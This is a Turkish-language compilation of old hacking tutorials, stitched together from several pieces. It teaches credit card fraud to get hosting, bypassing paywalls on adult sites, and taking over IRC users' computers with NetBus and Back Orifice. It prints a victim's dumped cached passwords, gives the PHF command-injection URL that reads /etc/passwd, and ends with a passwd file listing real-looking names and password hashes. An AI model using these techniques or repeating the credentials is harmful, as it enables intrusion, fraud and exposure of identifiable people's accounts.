adreslerden gazlamasý kolay olan bir adres vereceðim :
www.hostingdeals.com. Bu verdiðim adres gerçekten çok gaz bir yerdir.
Yani 300 MB'lik bir alaný kolay bir þekilde elde
edebilirsiniz. Ýlla benim size verdiðim bu adresi kullanmak
zorunda deðilsiniz tabi fakat gazlamaya bu kolay adresten
baþlarsanýz ilerde daha büyük kapasiteli yerlerde elde
edebilirsiniz. Bu da sizin kabiliyetinize kalmýþ birþey
artýk. Ne demiþler : Önce Emeklenir, Sonra Yürünür, Sonra
Koþulur... Az önce verdiðim adrese gidin ve sign up linkine
týklayýn. Karþýnýza gelen pencereyi
mantýklý-sallama bilgilerle doldurun. En önemlisi e-mail
adresinizi mutlaka doðru verin. Daha sonra devam edin.
Karþýnýza 1-2 pencere daha çýkacak
bunlarý da mantýklý-sallama bilgilerle doldurun. Bu
arada verinizin yeteneklerini belirteceðiniz bir pencere gelecek
buradan hepsini iþaretleyin ne de olsa beleþ server,
herþeyi tamam olsun deðil mi yani... Önemli : Fiyat Ödeme
Þekillerinden en sað alt köþede olaný seçin.Sonra
en önemli pencere geliyoruz : Paranýn ödeneceði yer.
Ýsim bölümüne zaten tikmen ismimiz yazýlýr. Çünkü
daha önce bu bilgiyi vermiþtik. Kredi kart numarasý bölümüne
size daha önce not etmenizi istediðim numaralardan birini
yazýn. Son kullanma tarihi bölümünü de size daha önce not etmenizi
istediðim son kullanma tarihini ay/yýl; formatýnda
yazarak doldurun. Ve daha sonra done yapýp iþlemi bitirin.
300 MB'lik baba domain+serveriniz yaklaþýk 24 saat içinde
açýlacaktýr. Hepinize hayýrlý olsun.
Baþka yazýlarda görüþmek dileðiyle...byez
byez...
ADULT SITE
HACK
INTERNETTE BIR SURU ADULT SITESI VAR VE
HEPSIDE BAZI SCRIPTLER JAVALAR VEYA REFERRER
KULLANARAK BIRBIRINE LINK VERIYOR BEN BIR HACKER DEGILIM AMA UFAK BAZI
IPUCLARI VEREBILIRIM
YAPMANIZ GEREKEN ILK IS BISEYLER YURUTMEK ISTEDIGINIZ SITENIN PASSWORD
UNUN ELDE ETMEK
BUNUN ICIN BIR SURU PASSWORD SITELERI
VAR YA BUNLARDAN ELDE EDERSINIZ PASSWORDLERI TABI SABIR ISI BU BEN AZIM
ETTIM BIR KAC TANE
BULDUM CALISAN PASSWORD BU SITE O SEKILDE YAPILMISTIR YADA TUM WAREZ
SITELERINDE CREDIT
MASTER 4 VE CARD PRO GIBI PROGRAMLAR DAGITILIR BUNLARIN ISLEVI SIZE
HAZIRDA BAZI KREDI KARTI
NUMARALARI VERIRLER AMA
ELBETTE KI BU VERDIKLERI NUMARALAR HICBIR ISE YARAMAZ YAPMANIZ GEREKEN
ONCELIKLE GERCEK BIR
KREDI KARTI BULMAKTIR VE BU KARTTAN O PROGRAM VASITASIYLA NUMARALAR
URETMEKTIR BU
PROGRAMLAR SIZE 1000
TANE FALAN KART URETIR. ISIN ASIL PUF NOKTASI SU, BU URETTIGINIZ KREDI
KARTLARI NIN HEPSININ
BITIS TARIHLERI AYNI BOYLECE ELINIZDEKI KARTI KULLANARAK SIFRE
ALABILIRSINIZ FAKAT DIKKAT
HICBIR SEKILDE EMAIL YADA KENDINIZI BELLI EDECEK BILGI VERMEYIN SADECE
SANAL ISLERINIZI O
APTAL ADULT SITELERINDEN PASSWORD ALMAK GIBI ISLERINIZI YAPIN BU
KESINLIKLE BIR SUC TESKIL
EDER SAKIN HERHANGI BIR MAL SIPARIS ETMEYIN BIRINDEN ALDIGIM BILGIYE GORE
NEYSE KI ADULT
SITELERI BU KARTLARDAN PARA CEKEMEMEKTEDIR CUNKU USTLERINDEKI ISIMLER
TUTMAZ BU IYI HABER
KIMSEYE ZARARINIZ YOK AMA BU ISI YAPMAYIN RISKI BUYUK.SAHTE ACCOUNT
KULLANMAYA DIKKAT EDIN.KIMLIK VERMEYIN VEYA www.anonymizer.com BU ADRESE
GIDIP BASVURUN IP
NUMARANIZI ONLAR SIZIN ICIN SAKLAYACAKLARDIR.
HERNEYSE BIR SITENIN PASSWORDUNU ELE GECIRDIKTEN SONRA SITEDE ARKA KAPI
(YANI SIFRESIZ BIR
YER) VAR MI DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE YAPIN TABI
SITEDEKI RESIMLERI
BULMAYA AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI
TELEPORT PRO
VASITASIYLA CEKTIKTEN SONRA ELINIZLE
KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI
GENELDE SIFRELIDIR
SIFRELI OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK
VERILMISSE MESELA SIZ
WWW.XXX.COM/MEMBERS TASINIZ ONLAR WWW.YYY.COM GIBI BIR YERE LINK VERMISLER
ISE ORANIN
BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA
BUNLAR REFERER
KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM
ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE OLAN DOSYALARI
BULMAKTIR BUNLAR COK
BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI
SITELERINDEKI BEDAVA
GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI
[URL="https://tik.lat/sp2Ux"] http://www.clubwicked.com/cgi-bin/stryseek.cgi?[/URL] head=index.html
bu mesela sitenin ana sayfasini acar eger
[URL="https://tik.lat/fqhEV"] http://www.clubwicked.com/cgi-bin/stryseek.cgi?[/URL] head=cinemax.html
derdeniz sitenin sinema sayfasina gidersiniz vb bunun gibi sitedeki
adreslere bakarak dolasirsiniz. BAZEN DE REFERER
KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O
ADRESTEN TIKLARSANIZ
GIRERSINIZ BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN
DUNYANIN *** SITELERI
AYAGINIZIN DIBINDE BAKIN MESELA SU ADRES BIR ORNEK OLSUN
[URL="https://tik.lat/jLJGa"] http://www.adultmagazine.com/cgi-bin/tv?page=1998/[/URL] 08/cover.html&ID=00409666
BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE
GIDIN SIZE MUTLAKA
INTERNAL SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI
KANDIRIYO ADAM
GITMENIZ GEREKEN ADRES ASLINDA SU ISE TUM FAZLALIKLARI ATALIM BU ADRESE
GIREMEDINIZ SIMDI
AYNI SAYFADA FAZLALILLARI ATALIM VE
SOYLE YAZALIM
[URL="https://tik.lat/1Vrnp"] http://www.adultmagazine.com/1998/08/cover.html[/URL]
cgi-bin i attim; /tv?page= i attim &ID=00409666 i attim boylece
sayfadayim
BAZI ADRESLER DE SIZIN NEREDEN GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR
SAYFAYA GONDERMEYE
KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN ONCE HEMEN
STOP A BASIN KI
O SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE
BAKARAK SIZI YA PARA
ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE
BIZ STOP A BASIP
BIZI GONDERECEGI GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA
[URL="https://tik.lat/bAlau"] http://www.missx.com/live/liv.cgi?ty...ame=pics2.html[/URL]
BU SAYFA SIZI HEMEN MEMBERS KLASORUNE ATMAYA CALISACAKTIR
HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE TABI IKI UC KERE O
SAYFADA KALIN EEE SIMDI
NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM
[URL="https://tik.lat/gTQE1"] http://www.missx.com/live/[/URL]
YAZDIGIMIZ ZAMAN 100BINLERCE RESIM KARSIMIZDA NOT:BU HERIFLER ACAIP
DONEKTIR BEN BU YAZIYI
YAZARKEN BU OLAY CALISIYODU BU BIR ORNEKTIR LINKI
KAPAYABILIRLER
BILGISAYARA NASIL GIRILIR
Bu bolumde,
baskalarýnýn bilgisayarýna girme ve internet
sifrelerini calma olaylarýný ogrenicez..
Ýlk olarak bu olaylarý gerceklestirmek icin 4 adet programa
ihtiyacimiz var..Wingate,
Netbus,Bo, Telnet(her windowsun icinde vardir)..Diger programlari
cehennemin
Ýlk olarak irc'de kendimize bir kurban secip, ip
numarasýný alýyoruz (/dns nickname)..
Sonra wingate'i calýstýrýyoruz..
"Hostname or Ip" yazan yere kurbanýmýzýn ip
numarasýný giriyoruz..
"Scan Port" kýsmýnda 23 seklindeki rakamlarý 12345
yapýyoruz sonra asagýdan
3. secenek olan try to open the port only" i secerek "scan!" butonuna
basýyoruz..
"Servers found" kýsmýnda bir kac tane ip yazmasý
lazým sansa bir tanesini secin..
Sonra netbus'ý calýstýrýp hostname/ip yazan
yere wingateden buldugunuz ipyi yazýn..
Sifre isterse telnetten sifreyi kýrmamýz lazým..Eger
sifre istemezse isiniz kolay...
Ben sifre istedi varsayýyorum ve anlatmaya devam...
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup
calýstýrýn...
Baglana gelip uzaktaki sistem'e týklayýn...
Ana bilgisyar adý: wingatede buldugmuz ipyi yazýyoruz
Baglantý Noktasý kýsmýna ise netbus portu olan
12345 yaziyoruz..baglana týklýyoruz..
yukarda netbus 1.6 veya 1.7 yazar..
simdi sifreyi kirmak icin
Password;1;123 ServerPwd;anatolia
bu yazýyý pasteliyoruz...ve sifre cehennem oluyor,siz
sifreyi
cehennem yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artýk sifre anatolia
giriyoruz...Artýk adamýn
bilgisayrýndayýz..
file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye
yolliycagimizi soruyor..
c:windows yazarak windowsun altina atiyoruz
yolladiktan sonra download ewkranýný kapiyoruz..
start program diyoruz...c:windowsboserve.exe diyoruz...
tamam netbustaki isimizde bitti..
Þimdi Back Orifice'ye geçiyoruz
target host orta adamýn ipsini yazýyoruz..yan tarafada
12345
yan taraftan system passwordsu secip send e basýyoruz ve bingoooo
bu adýmda 10un ustunde password varmis..
Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm..
bu arada adamdan cikan passler
** 0 ing host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1 ystem passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*RnaAT&T WorldNet [email][email protected]'
Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*RnaMicrosoft Internet Referral Serviceicwsignup' Password:
'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*RnaTurk Nokta Netabaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*RnaTurk Nokta Netburak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rnasolamnýk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*RnaTurk Nokta Netnecatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*RnaAlnetersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*RnaBurakrbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*RnaBaðlantým 5rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*RnaBurakr1056700' Password: 'DABmvsVG•('
index:18(06) len:40(19/122)
Resource: '*RnaBurakdoganalp' Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rnanolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*RnaBurakb1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*RnaAÝDATAsuen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*RnaBaðlantým 4merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*RnaBaðlantým 7 baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rnabayrakbaycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*RnaBurakburak' Password: 'burakì '
index:12(06) len:30(16/62)
Resource: '*RnaAlnetmerko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rnacenkbaycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
------------------------- End of Data -------------------
SAVUNMA
Acilis konusmasi ile olaya
baslayalim;boyle bir sayfa yapma amacim kendini hacker sanan oysa sadece
elindeki bazi programlardan nuke atmaktan oteye gitmeyen
arkadaslara(Yani Lamer'lara) karsi onlem almak.Her ne kadar bu
arkadaslar hacker olmasada bu arkadaslarin elindeki programlarin verdigi
zaralari gos ardý etmemek gerek.
Oncelikle sik karsilastiginiz onemli
internet protokollerini aciklayalim IP internet protocol)20 byte
dan olusan internetteki her seyin tasindigi veri iletisim
protokoludur.Diger protokollerin hepsi bu protokolden tasinirve ve ip
nin sonuna eklenir.Ip nin icinde paket parcalama ofseti,izleyen protokolun
tipi,paketin canli kalacagi sure,kaynak ip adresi,hedef ip adresi gibi
alanalr vardir TCP Transmission Control Protokul)TCP,ana uzunlugu
20 byte olan
www,e-mail,irc gibi internette en cok kullanilan iletisim protokoludur
ICMP internet control messaging protokol)bu protokol teshis
etme ve mesejlasmayi iceririr.Bilgisayarlar arasindaki hat hizini ve
bilgisayarin
hatta olup olmadigini anþamak icin kullanilir.Mesala ping komutu ile
bunu yapabilir ilerleyen bolumlerde bu ozelligi kullanarak hattan dusmeyi
engelleyen bir program verecegim. IGMP internet group manegement
protokol)ismindende anlasildigi gibi bilgisayar gruplarina bilgi alinip
gonderilmesini saglar.Ýnternet
uzerinde bir cok radyo bu protokolle yayin yapar. Simdide
saldiri icin kullanilan temel acikliklari inceleyelim
IP'nin zayif noktalari:Ip'nin en buyuk acik noktasi gelen ve giden
bilginin kaynaginin ve iceriginin kontrol edilmemesidir.Bu yolla yeterli
bir bilgi veya bazi programlarla bilgisayar yanlis bilgi gonderile-
rek bilgisayara hack edilebilir veya bilgisayar kilitlenebilir. Network
topolojisinin zayif noktalari:Eger network uzerinde anahtar
kullanmiyorsaniz gonderdiginiz bilgi tum aga ugrar.Bu durumdan belli bir
programlarla yaralanalinilabilir.Ornegin bu yontemle ag uzerinde
sizin yaptiginiz butun gorusmeler izlenebilir
pwl : password list
Kýsaca pwl(PassWord List)
dosyasýndan bahsetmek istiyorum. Bu dosya windows95/98'deki tüm
cached ve kayýtlý password'lerin olduðu bir
dosyadýr. Yani kullanýcý internete baðlanmak için
ISP þifresini yazacaktýr, bu þifre büyük ihtimalle
bilgisayarýn hafýzasýnda yer edecektir ve .pwl
dosyasýnda da listelenecektir.
Bu dosya c:windows dizini altýnda bulunur. Kullanýcý
adýnýn ilk 8 karakteri ve .pwl uzantýsýndan
oluþur. Yani benim kullanýcý adým "PooLSharK"
ise pwl dosyam "poolshar.pwl"dir. Hatta þimdi kendinizinkini bile
hemen bulabilirsiniz. Tek yapmanýz gereken c:windows dizinine
gidip pwl dosyasýný bulmaktýr.
Çoðu password burada listelenir. Ancak bir metin editörü (ör: notepad)
ile bu dosyayý açarsak içerisinde anlamsýz karakterlerden
baþka birþey olmadýðýný görürürz.
Bunun nedeni ise þifrelerin belirli bir algoritma ile kodlanarak
saklanmasýdýr. Evet aynen öyle, kullanýcý
þifreleri þifrelenmiþ olarak bulunur. Yani .pwl
dosyasýnýn içindedir ancak anlaþýlýr bir
þekilde deðildir zira aynen aþaðýdaki gibidir:
–c. . .... .
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR. . .
. . Î. . . . . . ×. —.QDæù0”Á.æ.õˆí.ËÞ.„,{”¬M
.}.¤”[C.›. e¬€âUwØ.ž°ÅR‚’'õ¦qbtÝózåºÝ²½.†
“ûžu¶Üš§òo+.*á.ó.…0ÏC...&127;ÆûéDŠ
.6dU˜:ù
ý.PsMS»V©EBʪ¡$ç¢Í!Õ.Ìßl± â.Ž”Léa4o.•2±çu°
éŠ.Îw‡û^l—¹ˆ§`×vm™.v
“a×`ÔžÛ5AȨ.Ì{a2P–ñÚ
(Þifrenin orjinalliðini bozmak
için onu biraz kýsalttým, normalde daha uzun)
Ancak birþey eklemek istiyorum. Her zaman pwl
dosyasýný kýrmak iþe yaramayabilir. Yani içi
boþ da olabilir. Bu demek olmuyor ki o kiþinin hiç
kayýtlý þifresi yok. Tabii var ancak pwl
dosyasýna kaydedilmesine izin vermemiþ olabilir. Örnek olarak
superonline kullanýcýlarýnýn çoðunun
kullandýðý Superonline Guide programýný
ele alalým. Bu program sizi otomatik olarak internete baðlamaya
yarar ve bunun içinde kullanýcý adýnýz ve
parolayý program içerisindeki bir bölümde girmeniz gerekir. Program
sizin parolanýzý (þifrenizi) nete her
baðlanýþýnýzda ISP'nize iletecektir ve
internet baðlantýsýný kurarken username, password
gibi alanlar ile ilgilenmenize gerek kalmaz çünkü Superonline Guide bunu
sizin için yapar. Tamam yapar yapmasýna da nasýl yapar? Yani
bir kere programa username ve pw'ümüzü veriyoruz, o biz ne zaman istesek
kullanýyor bizim için. Tamam ama, bilgisayarý açýp
kapattýðýmýz zaman nasýl oluyor da bizim
pw'ler uçup gitmiyor? Demek ki þifrelerin bir yerde
kayýtlý olmasý gerekli. Ýþte bu
þifreler .pwl dosyasýnda saklanýyor. Program
þifreye ihtiyaç duyunca oradan alýyor, kullanýyor.
Ancak daha demin dedim ki, pwl dosyasýnýn kýrmak her
zaman þifrelerin açýða çýkmasýný
saðlamaz. Eðer kullanýcý pw'lerini unutmamak için
veya sürekli pw girmekten býktýðý için
yardýmcý bir program kullanmýyorsa (ör uperguide,
int.explorer'ýn pw hatýrlatma özelliði vs) yani, her
seferinde þifrelerini elle giriyorsa, bilgisyarýn diskini hiç
araya sokmuyorsa o zaman pw'ler pwl dosyasýna yazýlamaz.
Çünkü kullanýcý onlarý biryere kaydettirmiyor. Her
seferinde el ile giriyor Şu Belirsiz Ruhlara Pek Kızgınım bütün saygısı onların, bir eziyettir, bütün övgüleri bıkkınlık ve utanç
bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin
kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu
hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat
bir cok eski server da hala uygulanmakta ve netice alinabilmektedir
ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek
gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">http:// www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/ bin/cat%20/etc/passwd
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">cat%20/etc/ passwd
Satirini
browserinize yazip enter e basin bu satir passwd dosyasini acmaya
calisacaktir(adresi attim)
Error
404
/cgi-bin/phf
is not found on this server
Bu satirlar
karsiniza cikarsa bilinki server yeni ve size gecit
vermiyor
Ama asagidaki
listeyi verirse bilinki buldunuz ))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/
passwd
root:2fkbNba29uWys:0Operator:/:/
bin/csh
www-admin:rYsKMjnvRppro:100WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012 lyutah
CAFER:/home/user/asprilla:/usr/
local/bin/tcsh
hasan:dvUMqNmeeENFs:1016lois
figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006: 10:mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:kFph8HEM/aaAA:1007Kemal
GULOGLU:/home/user/güloglu:/bin/csh
PHF teknigini
arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz ))
tabi yukardaki satirlari en iyi ihtimali goz onune alinarak
yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki
gibi:
root:*:0Operator:/:/bin/csh
www-admin:*:100WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012CAFER:
/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016lois
figo:/home/user/hasan:/bin/csh
necmettin:*:1006mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:*:1007kemal
GULOGLU:/home/user/güloglu:/bin/csh
Bu tek *
sifreleri kirdigini iddia eden bazi programlar var ama ben sadece
guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i
cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az
kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell
in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son
baglanilan tarihi size verir az kullanilan accountlari
kullanin
SERVERLARI SASIRTMAK
Simdi size bir serveri nasil cildirtirsiniz onu anlaticam
Olaya gavurlar PORT SURF diyolar ...nedir yaw bu port surf??
Annatiim imdi internete bagli her tip makinanin iletisim (data transferi)
yapabilmesi icin cesitli portlar kullandigini biliyorsunuz(en azindan
ogrendiniz)bu portlar internete aciladn gediklerdir aslinda.
Baazi portlar ve islevleri:
PORT23 log icin kullanilir
PORT25 e-mail yollamak icin
PORT80 web sayfalari icin
Tamam bu kadar bilgi yeter sanirim cunku saymakla bitmez nesse nediyoduk
hah port surf iste size nasil yapilir onu anlatacam.
BÖLÜM 1 FIREWALL tespiti
DOS u acin ve
C:WINDOWS>tracert 152.163.199.42 (bu ip serverin ip si olmali ben
salladim)
Tracing route to dns-01.aol.com [152.163.199.42]over a maximum of 30
hops:
1 * * * Request timed out.
2 150 ms 144 ms 138 ms 204.134.78.201
3 375 ms 299 ms 196 ms essek-cyberport.nm.westnet.net [204.134.78.33]
4 271 ms * 201 ms raks365.nm.org [129.121.1.3]
5 229 ms 216 ms 213 ms h4-0.cnss116.Turknet.t3.ans.net[192.103.74.45]
6 223 ms 236 ms 229 ms f2.t112-0.Gediz.t3.ans.net[140.222.112.221]
7 248 ms 269 ms 257 ms h14.t64-0.Izmir.t3.ans.net [140.223.65.9]
8 178 ms 212 ms 196 ms h14.t80-1.raks.net [140.223.65.14]
9 316 ms * 298 ms h12.t60-0.raks.net [140.223.61.9]
10 315 ms 333 ms 331 ms 207.25.134.18
11 * * * Request timed out.
12 * * * Request timed out.
13 207.25.134.189 reports: Destination net unreachable.
Gibi bi tablo karsimza cikicak .Tablo serverlar zincirini bize gosteriyo
bakin 13.Server varya iste o serveri tanimlayamadi nedeni muhtemelen
firewall
Bu demektirki ayni firmanin(orn superonline)bir baska serverini
deniicez.Yalniz dikkat edilmesi gereken husus sinyal yolculugumuzun hangi
serverda bittigi hep ayni server da bitiyosa bu demektirki bu server ana
server dir
Ikinci servere da tracert alalim
C:WINDOWS>tracert 198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]over a maximum of 30
hops:
1 * * * Request timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms turk.net [204.134.78.33]
4 166 ms 228 ms 189 ms raks365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.gediz.t3.ans.net [192.103.74.45]
6 284 ms 296 ms 178 ms f2.t112-0.Izmir.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Istanbul.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.raks.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-raks.net [198.83.210.28]
Trace complete.
Hehehe bakin bunda firewall falan yok hohohoyt temiz ve bakire(Isilay
Saygin gibi) simdiiii sira geldi PORTSURF a....
Simdi telnetlerinizi acacaksiniz ve preferences te local echo kismini
tikleyin baglanti olarak (yukardaki ornege gore 198.83.210.2
tiklanmazsa win95 telnet ekraninda bisii goremezsiniz)
Connect remote sysstemde telnet yazan menude daytime yi secin ve connect
olun size tarih saat ve zamani bildiren bir msg gelicek tabbiki serverin
bash history sine kaydiniz gecicek sysadmin oha noluyo lam onune gelen
bizim servere girmis diicek
Hahahaha adami cildirttiniz be ...
Daha ileri ve tehlikeli safhalarda port surf yapmak mumkun anlatirmiyim
bilemiyorum cunku bu isler basinizi agritbilir benden soolemesi
vallaaaa(anlatacam) ))
Password Kýrma
Herhangi bir ftp veya
..... gibi yerlere girilirken kullanýlan þifreler passwd
dosyasýna alegoritmatik bir þekilde
kayýtlýdýr.Bu passwd dosyalarý ftp'nin veya
....'nýn içinde bulunurlar.Ýþte bu da çok büyük bir
güvenlik boþluðu meydana getirdiðinden dünyadaki çoðu
hackerlar,crackerlar..... bu güvenlik boþluðundan yararlanarak
kolay bir þekilde istediklerine ulaþabilirler.
Passwd
mantýðý nedir?
Herhangi bir passwd
dosyasýnýn içeriðine (edit,view)
baktýðýmýzda aþaðýdaki gibi bir
metin görürüz:
root:U5SNZk2JeFyqc:0:0: root:/root:/bin/bash
bin:*1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4lp:/var/spool/lpd:
sync:*:5:0 ync:/sbin:/bin/sync
shutdown:*:6:0 hutdown:/sbin:/sbin/shutdown
halt:*0:halt:/sbin:/sbin/halt
mail:*12:mail:/var/spool/mail:
news:*13:news:/usr/lib/news:
uucp:*14:uucp:/var/spool/uucppublic:
operator:*0perator:/root:/bin/bash
man:*:13man:/usr/man:
postmaster::14:12 ostmaster:/var/spool/mail:/bin/bash
cans:/uyl4V8zixlaE:501:220 evket Can:/home/nyt/cans:/bin/bash
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
adem:F.3SJTjMEDcpU:503:240:Adem Erdogan:/home/num/adem:/bin/bash
gurelil RABgVdC.Z2JA:504:220:Lutfiye Gureli:/home/nyt/gurelil:/bin/bash
acarkans:uddbZ9Mx98iKY:505:220 uheyla
Acarkan:/home/nyt/acarkans:/bin/bash
bekdemir nP07pY6gxPvQ:506:220:Nigar
Bekdemir:/home/nyt/bekdemir:/bin/bash
ayberst:HbDYSOFSXo83k:507:220:Timucin Aybers:/home/nyt/ayberst:/bin/bash
kopuzb:JdYc5r.nfGaEY:508:220:Bayram Kopuz:/home/nyt/kopuzb:/bin/bash
aksita:Agisok05JXRrI:509:220:Ahmet A. Aksit:/home/nyt/aksita:/bin/bash
cimcimk:Ai8r6m1xPcmMw:510:220:Kasif Cimcim:/home/nyt/cimcimk:/bin/bash
tanzer:FnlWFqrYfvVeo:511:240:Tanzer Turker:/home/num/tanzer:/bin/bash
erkoly:Nc.Hq472OXz8k:513:230:Yilmaz Erkol:/home/kim/erkoly:/bin/bash
nyt:A04MMiSSbfAB2:514:220:NYT Bolumu Resmi:/home/nyt/nyt:/bin/bash
borakf:GagTSqeRGJV.c:516:200:Fahir Borak:/home/cnaem/borakf:/bin/bash
uzmenr:0mZJYiyceKJeo:517:200:Resat Uzmen:/home/cnaem/uzmenr:/bin/bash
yaylia:Jm9S5MLXd/R2M:521:220:Ahmet YAYLI:/home/nyt/yaylia:/bin/bash
ozaly:FfGyZIHjOqcoU:522:200:Yasar OZAL:/home/cnaem/ozaly:/bin/bash
yasars:KizDcrryIQhzc:523:270 edat YASAR:/home/saf/yasars:/bin/bash
koksalg:GlDNRAsIGNjWQ:524:290:Guler KOKSAL:/home/rbi/koksalg:/bin/bash
taylans:JnwMm9uPt76Rs:525:210 inan TAYLAN:/home/rea/taylans:/bin/bash
anach:WDkDAsL9FHR/U:526:210:Hakan ANAC:/home/rea/anach:/bin/bash
akgunf:MiNaiGGyR1JG6:527:280:Fadil Akgun:/home/end/akgunf:/bin/bash
subasim:AndMbHdgb5H9.:529:300:Metin Subasi:/home/fiz/subasim:/bin/bash
sungura:JoSjnOjcZqCtM:530:250:Ayse Sungur:/home/rif/sungura:/bin/bash
albayrak:IQJwi/qu0jTo2:531:220 erhan
Albayrak:/home/nyt/albayrak:/bin/bash
onera:Jbhdc51wn/WPw:532:201:Aysegul Oner:/home/cnaem/onera:/bin/bash
bayramy:AlZcxvhIRl6Xw:534:220:Yusuf Bayram:/home/nyt/bayramy:/bin/bash
koksalm:InYyYaGxOichA:535:270:Muhsin Koksal:/home/saf/koksalm:/bin/bash
vakif:cc:536:400:TAEK VAKFI:/home/taek/vakif:/bin/bash
seddighe:OgvuVQiGD/OGw:537:280:Emine Seddigh:/home/end/seddighe:/bin/bash
esenn GHW2392T48kw:538:280:Nur Esen:/home/end/esenn:/bin/bash
yildizi:FfCwQga4b/LvY:539:220:Izzettin YILDIZ:/home/nyt/yildizi:/bin/bash
basolt:MoXAnj2yuDVCg:540:310:Toygun Basol:/home/nel/basolt:/bin/bash
